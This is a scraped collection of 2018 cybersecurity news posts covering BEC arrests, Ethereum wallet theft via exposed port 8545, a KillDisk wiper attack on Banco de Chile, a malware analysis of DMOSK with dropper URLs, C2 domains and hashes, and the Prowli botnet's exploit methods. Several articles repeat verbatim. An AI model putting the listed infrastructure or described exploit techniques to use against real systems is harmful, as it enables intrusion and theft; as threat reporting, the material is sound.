The post Thriving Cybercrime Economy Contributes to More Than $1 Billion in Stolen Cryptocurrency appeared first on Security Intelligence.

Protecting consumers from mobile and IoT threats

A new report by Allot Communications revealed a dynamic and automated threat landscape in which consumers lack the security expertise to effectively protect themselves. Mobile and Internet of Things continue to be primary attack vectors, contributing to a spike in cryptojacking, adware, and DDoS attacks. The Telco Security Trends Report is based on anonymous data gathered from four communications service providers (CSPs) across Europe and Israel, who between them, protect seven million customers. It found … More

The post Protecting consumers from mobile and IoT threats appeared first on Help Net Security.

Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.

On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The authorities conducted the investigation for over six months, 42 suspects have been arrested in the United States, 29 in Nigeria, the remaining in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to recover of roughly $14 million in fraudulent wire transfers.

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.” 

bec operation wirewire

During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. in one case the suspects tricked a real estate closing attorney into wiring $246,000 to their account.

According to a report published by TrendMicro, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018. This rising value of loss for business takes into account new attack vectors like the one from Lebanese Intelligence Agency Dark Caracal malware who utilizes malware in android application.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $ 5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing Social Engineering to lure and deceive employees in a myriad of scams to bypass security measures. By using a deep understanding of Human Psychology hackers are circumventing the defenses, as the report states ” it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: Bogus invoice scheme, CEO fraud, Account compromise, Attorney impersonation and Data Theft. The report highlight that these attacks can be classified into two major groups: Credential grabbing and email only.

The analysis of losses caused by crimes reported in the FBI 2017 Internet Crime Report, a document that outlines cybercrime trends over the past year, BEC/EAC ($676,151,185) is prominent, followed by Confidence Fraud/Romance ($211,382,989), and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”

Pierluigi Paganini

(Security Affairs –BeC, Operation WireWire)

The post Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams appeared first on Security Affairs.

Experts warn hackers have already stolen over $20 Million from Ethereum clients exposing interface on port 8545

Cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000, from clients exposing the unsecured interface on port 8545.

Cybercriminals have raked over 20 million dollars in the past few months by hijacking poorly configured Ethereum nodes exposed online are continuing their operations.

In March, security experts from Qihoo 360 Netlab reported a hacking campaign aimed at Ethereum nodes exposed online, crooks were scanning for port 8545 to find wallets that exposed their JSON-RPC.

According to the researchers, the cybercrime gang stole 3.96234 Ether (between $2,000  and $3,000)., but currently, they have tracked another criminal gang that already stolen an amazing amount of funds that are available in their wallets.

Researchers claim the cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000.

“If you have honeypot running on port 8545, you should be able to see the requests in the payload, which has the wallet addresses,” states Qihoo 360 Netlab team. “And there are quite a few IPs scanning heavily on this port now.”

Geth is a popular client for running Ethereum node allowing users to manage them remotely through the JSON-RPC interface.

Developers can use this programmatic API to build applications that can retrieve private keys, transfer funds, or retrieve personal details of the owner of the wallet.

The hackers moved stolen funds to the Ethereum account having the address 0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464.
Ethereum port 8545

The good news is that the JSON-RPC interface comes disabled by default in most apps.

In May 2018, crooks used the Mirai-based Satori botnet to scan the Internet for Ethereum mining software that were left accidentally left exposed online.

Unfortunately there are several groups that are actively scanning the Internet for insecure JSON-RPC interface to steal funds from unsecured cryptocurrency wallets.

Development team have to secure their applications by only allowing connections to the geth client originating from the local computer, another alternative consists in the implementation of authentication mechanism for remote RPC connections.

Experts believe the hackers will increase their scanning for port 8545 also thanks the availability online of tools that automate the process.

Pierluigi Paganini

(Security Affairs –port 8545, hacking)

The post Experts warn hackers have already stolen over $20 Million from Ethereum clients exposing interface on port 8545 appeared first on Security Affairs.

Security Affairs: Crooks used a KilllDisk wiper in an attack against Banco de Chile as diversion for a SWIFT hack

Crooks attempted to hack the SWIFT system at the Banco de Chile and used a disk-wiping malware as a diversion strategy.

The intent of the attackers was to sabotage hundreds of computers at the Banco de Chile while they were attempting to breach the real target, the bank’s SWIFT money transferring system.

Causing a broad outage, the attackers aimed at distracting the internal IT staff while carrying our the cyberheist.

The attempted attack took place on May 24, as result, many systems at several of its branches were inoperable.

“May 24, 2018, Banco de Chile reports that today it detected the presence of a fault that affected our normal attention in branches, telephone banking and some specific services.” reads the security advisory published by the company,

“This generated the activation of our contingency protocol designed to maintain the continuity of the services, and in no case was the security of the products and transactions of our clients affected.” 

Initial investigation conducted by the bank revealed that the bank systems were infected by a malware.

“After an exhaustive investigation, it was determined that the origin of the detected fault was a virus, presumably from international networks, which directly affected Banco de Chile’s work stations, such as an inn in the offices and terminals of our executives and cashier personnel, among others, causing difficulties in branch service and telephone banking.” reads the announcement published by the bank on May 28.

Analyzing the images posted online by bank employees, it is possible to verify that the infected machine where hit by a malware that wiped their hard drives’ Master Boot Records (MBRs).

Bleeping Computer reported a screenshot of private IM conversations posted on a Chilean forum. According to a member of the forum, the wiper destroyed over 9,000 computers and over 500 servers.

According to experts from Arkavia Networks, the malware that infected the systems at the Banco de Chile was a KillDisk sample tracked as KillMBR by Trend Micro.

A couple of days ago, experts at Trend Micro reported the discovery of a new sample of KillDisk in Latin America, the malware infected the systems of a bank.

Trend Micro did not reveal the name of the bank, but likely it was the Chilean bank.

According to the experts, the hacker failed the attack because the real goal was obtaining the access to SWIFT network.

“Last May, we uncovered a master boot record (MBR)-wiping malware in the same region. One of the affected organizations was a bank whose systems were rendered inoperable for several days, thereby disrupting operations for almost a week and limiting services to customers.” reads the analysis published by Trend Micro.

“Our analysis indicates that the attack was used only as a distraction — the end goal was to access the systems connected to the bank’s local SWIFT network.”

The malware researchers determined that the malicious code was a strain of the dreaded Killdisk due to on the error message displayed by the affected systems.

Banco de Chile mbr-killdisk-latin-america

The malware discovered by Trend Micro wipes all physical hard disks on the infected system, it retrieves the handle of the hard disk and overwrites the first sector of the disk (512 bytes) with “0x00”, then forces the machine to shut down.

Trend Micro team associated the sample of the KillDisk recently discovered with the operations of a crime gang that a few weeks ago attempted to steal over $110 million from the Mexican bank Bancomext.

Pierluigi Paganini

(Security Affairs –Banco de Chile, wiper)

The post Crooks used a KilllDisk wiper in an attack against Banco de Chile as diversion for a SWIFT hack appeared first on Security Affairs.



Security Affairs

Crooks used a KilllDisk wiper in an attack against Banco de Chile as diversion for a SWIFT hack

Crooks attempted to hack the SWIFT system at the Banco de Chile and used a disk-wiping malware as a diversion strategy.

The intent of the attackers was to sabotage hundreds of computers at the Banco de Chile while they were attempting to breach the real target, the bank’s SWIFT money transferring system.

Causing a broad outage, the attackers aimed at distracting the internal IT staff while carrying our the cyberheist.

The attempted attack took place on May 24, as result, many systems at several of its branches were inoperable.

“May 24, 2018, Banco de Chile reports that today it detected the presence of a fault that affected our normal attention in branches, telephone banking and some specific services.” reads the security advisory published by the company,

“This generated the activation of our contingency protocol designed to maintain the continuity of the services, and in no case was the security of the products and transactions of our clients affected.” 

Initial investigation conducted by the bank revealed that the bank systems were infected by a malware.

“After an exhaustive investigation, it was determined that the origin of the detected fault was a virus, presumably from international networks, which directly affected Banco de Chile’s work stations, such as an inn in the offices and terminals of our executives and cashier personnel, among others, causing difficulties in branch service and telephone banking.” reads the announcement published by the bank on May 28.

Analyzing the images posted online by bank employees, it is possible to verify that the infected machine where hit by a malware that wiped their hard drives’ Master Boot Records (MBRs).

Bleeping Computer reported a screenshot of private IM conversations posted on a Chilean forum. According to a member of the forum, the wiper destroyed over 9,000 computers and over 500 servers.

According to experts from Arkavia Networks, the malware that infected the systems at the Banco de Chile was a KillDisk sample tracked as KillMBR by Trend Micro.

A couple of days ago, experts at Trend Micro reported the discovery of a new sample of KillDisk in Latin America, the malware infected the systems of a bank.

Trend Micro did not reveal the name of the bank, but likely it was the Chilean bank.

According to the experts, the hacker failed the attack because the real goal was obtaining the access to SWIFT network.

“Last May, we uncovered a master boot record (MBR)-wiping malware in the same region. One of the affected organizations was a bank whose systems were rendered inoperable for several days, thereby disrupting operations for almost a week and limiting services to customers.” reads the analysis published by Trend Micro.

“Our analysis indicates that the attack was used only as a distraction — the end goal was to access the systems connected to the bank’s local SWIFT network.”

The malware researchers determined that the malicious code was a strain of the dreaded Killdisk due to on the error message displayed by the affected systems.

Banco de Chile mbr-killdisk-latin-america

The malware discovered by Trend Micro wipes all physical hard disks on the infected system, it retrieves the handle of the hard disk and overwrites the first sector of the disk (512 bytes) with “0x00”, then forces the machine to shut down.

Trend Micro team associated the sample of the KillDisk recently discovered with the operations of a crime gang that a few weeks ago attempted to steal over $110 million from the Mexican bank Bancomext.

Pierluigi Paganini

(Security Affairs –Banco de Chile, wiper)

The post Crooks used a KilllDisk wiper in an attack against Banco de Chile as diversion for a SWIFT hack appeared first on Security Affairs.

Security Affairs newsletter Round 166 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
Impervas research shows 75% of open Redis servers are infected
Microsoft reportedly acquires the GitHub popular code repository hosting service
North Korea-Linked Covellite APT group stopped targeting organizations in the U.S.
NYT: Facebook APIs gave device makers deep access to user data. FB disagrees
Thousands of organizations leak sensitive data via misconfigured Google Groups
Updated: Microsoft reportedly acquires the GitHub popular code repository hosting service
‘Zip Slip arbitrary file overwrite vulnerability affects thousands of projects
Iron cybercrime group uses a new Backdoor based on HackingTeams RCS surveillance sw
MyHeritage data breach – 92.3 million user credential exposed
Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
The author of the Sigrun Ransomware decrypts Russian victims files for free
Are Wi-Fi hotspots in World Cup Russia host cities secure?
How Threat Hunters Operate in Modern Security Environments
HR Software company PageUp victim of a Data Breach, experts fear a domino effect
It’s not a joke, Owari botnet operators used root as username and password to access a C&C
Adobe fixed the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East
Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices
Russia-linked Sofacy APT group adopts new tactics and tools in last campaign
VPNFilter malware now targets new devices, even behind a firewall
Cisco patches a critical vulnerability in Prime Collaboration Provisioning solution
DMOSK Malware Targeting Italian Companies
Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users
Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
Chinese state-sponsored hackers steal 600GB U.S. Navy data
Cisco removed hardcoded credentials in WAAS software. Undocumented accounts are a frequent issue
Trend Micro spotted a new variant of KillDisk wiper in Latin America

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 166 – News of the week appeared first on Security Affairs.

#CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online

Summer has officially rolled out its welcome mat. But as most parents might be thinking about slowing down, for most kids, summer is when digital device use goes into overdrive. That’s why June — which also happens to be Internet Safety Month — is a perfect time strengthen your family’s digital readiness.

Good news: This digital safety skills booster is quick and actionable. And who knows — if a few of these tips boost your family’s safety, you may have just saved summer for everyone!

4 Ways to Boost Family Safety Online 

Practice safe social. Challenge your family to reign in its social footprint by taking these specific actions: 1) Adjust privacy settings on all social networks. 2) Trim friend and follower lists. 3) Delete any personal data on social profiles such as birthdate, address, or school affiliation. 4) Edit, limit app permissions. As we’ve just seen in the headlines, the misuse of personal data is a very big deal. 5) Share with care. Routinely scrolling, liking, and commenting on social sites such as Snapchat and Instagram can give kids a false sense of security (and power). Remind tweens and teens to share responsibly. Oversharing can damage a reputation and words or images shared callously can damage other people.

Practice safe gaming. Summertime is a gamer’s heaven. Endless battles and showdowns await the dedicated. However, some digital pitfalls can quickly douse the fun. According to the National Cyber Security Alliance’s gaming tip sheet, safe gaming includes: updating gaming software, protecting devices from malware, protecting your child’s personal data, using voice chat safely, and paying close attention to content ratings.

Practice strong security. There are some steps only a parent can take to safeguard the family online. 1) Parental controls. Filtering software blocks inappropriate websites and apps as well as establishes boundaries for family tech use. 2) Comprehensive security software helps protect your PCs, tablets, and devices from viruses, malware, and identity theft. 3) Keeping your guard up. According to McAfee’s Gary Davis staying safe online also includes digital habits such as using strong passwords, boosting your network security and firewall, and being aware of the latest scams that target consumers.

Practice wise parenting. 1) Know where kids go. Know which apps your kids love and why, how they interact with others online, and how much time they spend online. 2) Unplug. Establish tech-free family activities this summer. Powering off and plugging into quality time is the most powerful way to keep your family safe online. Strong relationship empowers responsibility. 3) Be confident. As parenting expert, Dr. Meg Meeker says, parents should be parenting from a place of confidence, rather than from a place of fear. “The temptation for parents is to think that they have no control over what their child does online. This isn’t true,” says Meeker. “Parents, you are in control of your child’s technology use; it is not in control of you.”

toni page birdsong

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post #CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online appeared first on McAfee Blogs.

DMOSK Malware Targeting Italian Companies

The security expert and malware researcher Marco Ramilli published a detailed analysis on a new strain of malware dubbed DMOSK that targets Italian firms,

Today I’d like to share another interesting analysis made by my colleagues and I. It would be a nice and interesting analysis since it targeted many Italian and European companies. Fortunately, the attacker forgot the LOG.TXT freely available on the dropping URL letting us know the IP addresses who clicked on the first stage analyzed stage (yes, we know the companies who might be infected). Despite what we did with TaxOlolo we will not disclose the victims IP addresses and so the companies which might be infected. National CERTs have been involved and they’ve got alerted.  Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that ?!). The eMail we’ve got had the following body.

 

Attack Path
A simple link to a drive ( drive.carlsongracieanaheim.com ) is beginning our first stage of infection. An eMail address is given as one parameter to the doc.php script which would record the IP address and the “calling” email  address belonging to the victim. The script forces the browser to download a .zip file which uncompressed presents to the victim a JSE file called: scan.jse.  The file is hard obfuscated. It was quite difficult to be able to decode the following stage of infection since the JavaScript was obfuscated through, at least, 3 different techniques. The following image shows the Obfuscated sample.

 

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed once de-obfuscated it we figured out that it was dropping and executing another file having the .SCR mimetype. From this stage it’s interesting to observe that only one dropping URL was called. It’s a strange behaviour, usually the attackers use multiple dropping URLs in order to get more chances to infect the victims. The found URL was the following one:
“url”: “https://drive.carlsongracieanaheim.com/x/gate.php”

The JSE file dropped the Third Stage into \User\User\AppData\Local\Temp\38781520.scr having the following  hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 which has been previously analysed by 68 AV but only 9 of them recognised as malicious generic file. The following image shows the VirusTotal analysis.

 

Third Stage: Executable SCR file

 

Unfortunately, we are still not at the end of the infection Stage. The Third stage drops and executes another payload. It does not download and execute from a different dropping website but it drops from a special and crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the Fourth Stage payload directly from the victim’s memory

 

Fourth Stage: Dropped PE File
Following the analysis it has been possible to figure out that the final payload is something very close to ursnif which grabs victims email information and credentials. The following image shows the temporary file built before sending out information to Command and Controls servers.

 

Temporary File Before Sending data to Command and Control

Like any other ursnif the malware tries to reach a command and control network located both on the clear net and on the TOR network. The following section will expose the recorded IoCs.

An interesting approach that was adopted by attackers is the blacklisting. We observed at least 3 blacklists. The first one was based on victims IP. We guess (but we have not evidence on that) that the attacker would filtering responses based on Country in order to make possible a country targeted attack by blacklisting not-targeted countries. The following image shows the used temporary file to store Victim IP. The attacker could use this information in order to respond or not to a specific malware request.

Temporary File Storing IP Victim IP Address

 

A second black list that we found was on the dropping URL web site which was trained to do not drop files to specific IP addresses. The main reasons found to deny the dropping payload were three:
  • geo (Out of geographical scope). The threat is mainly focused to hit italy.
  • asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would have no sense to give payload to cloud providers.
  • MIT. THe attacker does not want the dropping payload ends up to MIT folks, this is quite funny, isn’t it ?
A small section of blacklisting drop payload
The blacklists are an interesting approach to reduce the chance to be analyzed, in fact, the blacklisted IPs belong to pretty known CyberSecurity Companies (Yoroi is included) which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: This is a reverse targeting attack, where the attacker wants to attack an entire set of victims but not some specific ones, so it introduces a blocking delivery of payload technique. End personal note.
Now we know how the attack works, so lets try to investigate a little bit what the attacker messed out. For example lets try to analyse the content of the Dropping URL. Quite fun to figure out the attacker let freely available his private key ! I will not disclose it …. let’s say… for respect to the attacker (? really ?)

 

Attacker Private Key !

While the used public certificate is the following one:

Attacker Certificate

By decoding the fake certificate the analyst would take the following information, of course, none of these information would be valuable, but make a nice shake of analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16

 

Maybe the most “original string”, by the meaning of being written without thinking too much from the attacker, on the entire malware analysis would be the string  ‘dmosk’ (in the decoded certificate), from here the Malware name.
As today we observed: 6617 email addresses that potentially could be compromised since they clicked on the First stage (evidence on dropping URL). We have evidence that many organisations have been hit by this malware able to bypass most of the known security protections since it was behind CloudFlare and with not a specific bad reputation. We decided to not disclose the “probably infected” companies. Nation Wide CERTs have been alerted (June 7 2018) and together we will contact the “probably infected” companies to help them to mitigate the threat.
Please update your rules, signature and whatever you have to block the infection.
PS: the threat is quite a bit bigger than what I described, there are several additional components including APK (Android Malware), base ciphers, multi-stage obfuscators and a complete list of “probably infected” users, but again, we decided to encourage the notification speed rather than analysis details.
Hope you might find it helpful.

IoC:

  • Dropurl:
    • https:// drive[.carlsongracieanaheim[.com/doc.php
    • https:// drive[.carlsongracieanaheim[.com/doc1.php
    • https:// drive[.carlsongracieanaheim[.com/x/gate.php
    • https:// drive[.carlsongracieanaheim[.com/1/gate.php
  • C2 (tor):
    • https:// 4fsq3wnmms6xqybt[.onion/wpapi
    • https:// em2eddryi6ptkcnh[.onion/wpapi
    • https:// nap7zb4gtnzwmxsv[.onion/wpapi
    • https:// t7yz3cihrrzalznq[.onion/wpapi
  • C2:
    • https:// loop.evama.[at/wpapi
    • https:// torafy[.cn/wpapi
    • https:// u55.evama[.at/wpapi
    • https:// yraco[.cn/wpapi
    • https:// inc.robatop.[at/wpapi
    • https:// poi.robatop.[at/wpapi
    • https:// arh.mobipot.[at/wpapi
    • https:// bbb.mobipot.[at/wpapi
    • https:// takhak.[at/wpapi
    • https:// kerions.[at/wpapi
    • https:// j11.evama[.at/wpapi
    • https:// clocktop[.at/wpapi
    • https:// harent.[cn/wpapi
  • Hash:
    • 067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
    • 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
    • 8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
    • 1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
    • afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe
  • Cert:
-----BEGIN CERTIFICATE-----
MIID3zCCAsegAwIBAgIJAK4RHChf5QoWMA0GCSqGSIb3DQEBCwUAMIGFMQswCQYD
VQQGEwJSVTEMMAoGA1UECAwDU1BiMQwwCgYDVQQHDANTUGIxGDAWBgNVBAoMD0ds
b2JhbCBTZWN1cml0eTEWMBQGA1UECwwNSVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQ
dGVzdC5kbW9zay5sb2NhbDENMAsGA1UEAwwEdGVzdDAeFw0xODA2MDUxNTIyMjBa
Fw0yMjA2MDUxNTIyMjBaMIGFMQswCQYDVQQGEwJSVTEMMAoGA1UECAwDU1BiMQww
CgYDVQQHDANTUGIxGDAWBgNVBAoMD0dsb2JhbCBTZWN1cml0eTEWMBQGA1UECwwN
SVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQdGVzdC5kbW9zay5sb2NhbDENMAsGA1UE
AwwEdGVzdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMua+rsContr
RIvQHX/M2qE4H30dIaLpYUqKll3GaZl8nkSxDAtyytfkMxiMeyn6tg2wy1M8RgGN
7dqtQwUJHfRdiaebmliKMPJHBn3SOhTd/caf7v552C85AQuOKZMWgaJ/3gQodmgI
Tr7p8q7g2OWg4nE0nGXXasFZYVEU3S81Z0wxNriRD9geNfkamv8fi0hm8HzDnLdi
bjvbTAsqTdegkkk/41ssXttckQRhRpgIzqRJ+sappdu4FzTuxOVA4jSRgZokD1l2
QFr4YTEJSUz4QHDGbow3nLvqTEHpvG90tgr+AHcR31otPiI1wm6bTj6IdicFENfC
4+5aIkvm72cCAwEAAaNQME4wHQYDVR0OBBYEFBIc9X32dzRzR9T1pmrmdZtshmJ9
MB8GA1UdIwQYMBaAFBIc9X32dzRzR9T1pmrmdZtshmJ9MAwGA1UdEwQFMAMBAf8w
DQYJKoZIhvcNAQELBQADggEBAE8AE11sWLICXcBO64iYByM96ZSWWN1JYGRaFWJ8
l8J1BiQNxh5N31X1HBs/sc87CPuqBB8CKxukoYU1T54HZQYmb3NHdc3JLFH2ah/o
028TSCXy16uvGGcxMhNcoZUCjWQHJzbXbVvPjkKjkJ1RR8DV1hRMcYLfO6LtSjAd
h7VnPVBNffGC/n9eTQjvwOR+dRN1IFLzwmpnwqVcxxjJM3+2OExfWBzKQ08/7MK/
xM8X8cmAb11Oyg7RXnE7X9Cfygy/Rz2fDGv4K7N8YDdL5osnyrN5fG8L2GG+srJ2
wdFYILlV+eLyfhwr6Oor5Z4zPgvcLLKbpHxQBvdkEdqX5F0=

—–END CERTIFICATE—–

Original analysis available here.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(Security Affairs – dmosk, malware)

The post DMOSK Malware Targeting Italian Companies appeared first on Security Affairs.

Cryptomining malware digs into nearly 40% of organizations worldwide

Check Point published its latest Global Threat Index for May 2018, revealing that the Coinhive cryptominer impacted 22% of organizations globally – up from 16% in April, an increase of nearly 50%. May 2018 marked the fifth consecutive month where cryptomining malware dominated Check Point’s Top Ten Most Wanted Malware Index. Coinhive retained the top spot as the most prevalent malware with Cryptoloot – another crypto-mining malware – ranked second with a global reach of … More

The post Cryptomining malware digs into nearly 40% of organizations worldwide appeared first on Help Net Security.

Traffic manipulation and cryptocurrency mining campaign compromised 40,000+ machines

Unknown attackers have compromised 40,000+ servers, networking and IoT devices around the world and are using them to mine Monero and redirect traffic to websites hosting tech support scams, malicious browser extensions, and so on. The campaign, dubbed Operation Prowli by the Guardicore Labs team, spreads malware and malicious code to servers, websites and devices after compromising them via exploits, password brute-forcing and by taking advantage of weak configurations. Operation Prowli Two specific things grabbed … More

The post Traffic manipulation and cryptocurrency mining campaign compromised 40,000+ machines appeared first on Help Net Security.

Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices

Crooks have infected over 40,000 web servers, modems, and other IoT devices with the Prowli malware as part of a cryptocurrency mining campaign and to redirect victims to malicious sites.

The Prowli malware was spotted by researchers at GuardiCore, attackers composed the huge botnet by exploiting known vulnerabilities and brute-force attacks.

This campaign, dubbed Operation Prowli, aimed at servers and devices using the following arrack methods, including:

  • Using a self-propagating worm that targets systems running SSH by brute force credential guessing, then the infected machines download and run a cryptocurrency miner.
  • Exploiting the CVE-2018-7482 file download vulnerability to compromise Joomla! Servers running the K2 extension
  • Accessing the internet facing configuration panel of variety of DSL modems by using a URL such as http://:7547/UD/act?1 and passing in parameters exploiting a known vulnerability. The vulnerability affects the processing of SOAP data and allows remote code execution. This vulnerability was previously used by the Mirai worm.
  • Using several exploits and launching brute-force attacks o admin panel of WordPress sites.
  • Exploiting a 4-year-old vulnerability, CVE-2014-2623, to execute commands with system privileges on servers running HP Data Protector exposed to the internet (over port 5555).
  • Targeting Drupal, PhpMyAdmin installations, NFS boxes, and servers with exposed SMB ports via brute-force credentials guessing.

prowli op

Once attackers have compromised a server or an IoT device, they determine if they can use it for cryptocurrency mining operations. Hackers used a Monero miner and the r2r2 worm, a piece of malware used to launch SSH brute-force attacks from the hacked devices.

“The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case as in many others, our attackers prefer to mine Monero, a cryptocurrency focused on privacy and anonymity to a greater degree than Bitcoin.” reads the analysis published by the experts.

“Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.”

The hackers also compromised servers with the WSO Web Shell backdoor. Hacked websites were used to host malicious code that redirects visitors to a traffic distribution system (TDS), with such kind of attack scheme crooks monetize their efforts by selling hijacked traffic.

“Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.” continues the experts.

Further details on the Prowli campaign, including IoCs are reported in the analysis published by GuardiCore.

Pierluigi Paganini

(Security Affairs – Prowli, hacking)

The post Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices appeared first on Security Affairs.

Security Affairs: Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices

Crooks have infected over 40,000 web servers, modems, and other IoT devices with the Prowli malware as part of a cryptocurrency mining campaign and to redirect victims to malicious sites.

The Prowli malware was spotted by researchers at GuardiCore, attackers composed the huge botnet by exploiting known vulnerabilities and brute-force attacks.

This campaign, dubbed Operation Prowli, aimed at servers and devices using the following arrack methods, including:

  • Using a self-propagating worm that targets systems running SSH by brute force credential guessing, then the infected machines download and run a cryptocurrency miner.
  • Exploiting the CVE-2018-7482 file download vulnerability to compromise Joomla! Servers running the K2 extension
  • Accessing the internet facing configuration panel of variety of DSL modems by using a URL such as http://:7547/UD/act?1 and passing in parameters exploiting a known vulnerability. The vulnerability affects the processing of SOAP data and allows remote code execution. This vulnerability was previously used by the Mirai worm.
  • Using several exploits and launching brute-force attacks o admin panel of WordPress sites.
  • Exploiting a 4-year-old vulnerability, CVE-2014-2623, to execute commands with system privileges on servers running HP Data Protector exposed to the internet (over port 5555).
  • Targeting Drupal, PhpMyAdmin installations, NFS boxes, and servers with exposed SMB ports via brute-force credentials guessing.

prowli op

Once attackers have compromised a server or an IoT device, they determine if they can use it for cryptocurrency mining operations. Hackers used a Monero miner and the r2r2 worm, a piece of malware used to launch SSH brute-force attacks from the hacked devices.

“The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case as in many others, our attackers prefer to mine Monero, a cryptocurrency focused on privacy and anonymity to a greater degree than Bitcoin.” reads the analysis published by the experts.

“Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.”

The hackers also compromised servers with the WSO Web Shell backdoor. Hacked websites were used to host malicious code that redirects visitors to a traffic distribution system (TDS), with such kind of attack scheme crooks monetize their efforts by selling hijacked traffic.

“Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.” continues the experts.

